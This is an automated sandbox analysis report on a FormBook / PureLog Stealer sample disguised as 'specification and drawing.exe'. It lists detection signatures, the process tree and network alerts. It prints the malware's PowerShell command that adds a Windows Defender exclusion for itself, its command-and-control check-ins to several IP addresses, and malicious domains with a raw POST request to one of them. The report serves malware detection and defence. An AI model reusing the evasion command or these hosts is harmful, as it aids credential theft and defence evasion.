Windows Analysis Report
specification and drawing.exe

Overview

General Information

Sample name: specification and drawing.exe
Analysis ID: 1566626
MD5: 8941cbf2cdd44ecfe97f45a2fed0d94f
SHA1: 3dbed0eb010422bf5cd364da77e6f22abc27439c
SHA256: d785e400857a1fea973e9b1fdff8d1a31c4ffdf0aec99bcddf19a2107b230849
Tags: exe, user-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • specification and drawing.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\specification and drawing.exe" MD5: 8941CBF2CDD44ECFE97F45A2FED0D94F)
    • powershell.exe (PID: 3196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • specification and drawing.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\specification and drawing.exe" MD5: 8941CBF2CDD44ECFE97F45A2FED0D94F)
      • LfvKCNKdvt.exe (PID: 6480 cmdline: "C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wscript.exe (PID: 368 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • LfvKCNKdvt.exe (PID: 2488 cmdline: "C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.specification and drawing.exe.56c0000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.specification and drawing.exe.3de24c8.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
4.2.specification and drawing.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.specification and drawing.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.specification and drawing.exe.3de24c8.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                      System Summary

                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\specification and drawing.exe", ParentImage: C:\Users\user\Desktop\specification and drawing.exe, ParentProcessId: 6316, ParentProcessName: specification and drawing.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", ProcessId: 3196, ProcessName: powershell.exe
                      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\specification and drawing.exe", ParentImage: C:\Users\user\Desktop\specification and drawing.exe, ParentProcessId: 6316, ParentProcessName: specification and drawing.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", ProcessId: 3196, ProcessName: powershell.exe

                      AV Detection

                      Source: specification and drawing.exe, Avira: detected
                      Source: http://www.restobarbebek.xyz/jm9b/, Avira URL Cloud: Label: malware
                      Source: specification and drawing.exe, ReversingLabs: Detection: 65%
                      Source: Yara match, File source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: specification and drawing.exe, Joe Sandbox ML: detected
                      Source: specification and drawing.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specification and drawing.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: wscript.pdbGCTL source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LfvKCNKdvt.exe, 00000007.00000002.4581617841.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp, LfvKCNKdvt.exe, 0000000A.00000000.2476050477.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specification and drawing.exe, specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wscript.pdb source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_0076C7A0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0076C7A0
                      Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then xor eax, eax 8_2_00759F20
                      Source: C:\Windows\SysWOW64\wscript.exe, Code function: 4x nop then mov ebx, 00000004h 8_2_047B04CE

                      Networking

                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49786 -> 185.106.176.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49823 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49823 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49831 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49837 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49878 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49843 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49890 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49885 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49895 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49912 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49968 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49948 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49932 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49962 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49925 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49919 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50005 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50019 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50032 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50036 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50023 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 47.238.157.253:80
                      Source: DNS query: www.swenansiansie.xyz
                      Source: DNS query: www.mp3cevir.xyz
                      Source: DNS query: www.restobarbebek.xyz
                      Source: Joe Sandbox View, IP Address: 209.74.64.187
                      Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox View, ASN Name: VIMRO-AS15189US
                      Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown HTTP traffic detected: POST /08fk/ HTTP/1.1 | Host: www.swenansiansie.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Origin: http://www.swenansiansie.xyz | Referer: http://www.swenansiansie.xyz/08fk/ | Content-Length: 212 | Connection: close | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.1 | Date: Mon, 02 Dec 2024 13:37:23 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 555 | Connection: close
                      Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 02 Dec 2024 13:38:03 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 02 Dec 2024 13:38:06 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 02 Dec 2024 13:38:08 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 02 Dec 2024 13:38:19 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 02 Dec 2024 13:38:22 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 02 Dec 2024 13:38:25 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 02 Dec 2024 13:38:27 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:38:34 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:38:37 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:38:39 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 02 Dec 2024 13:38:42 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
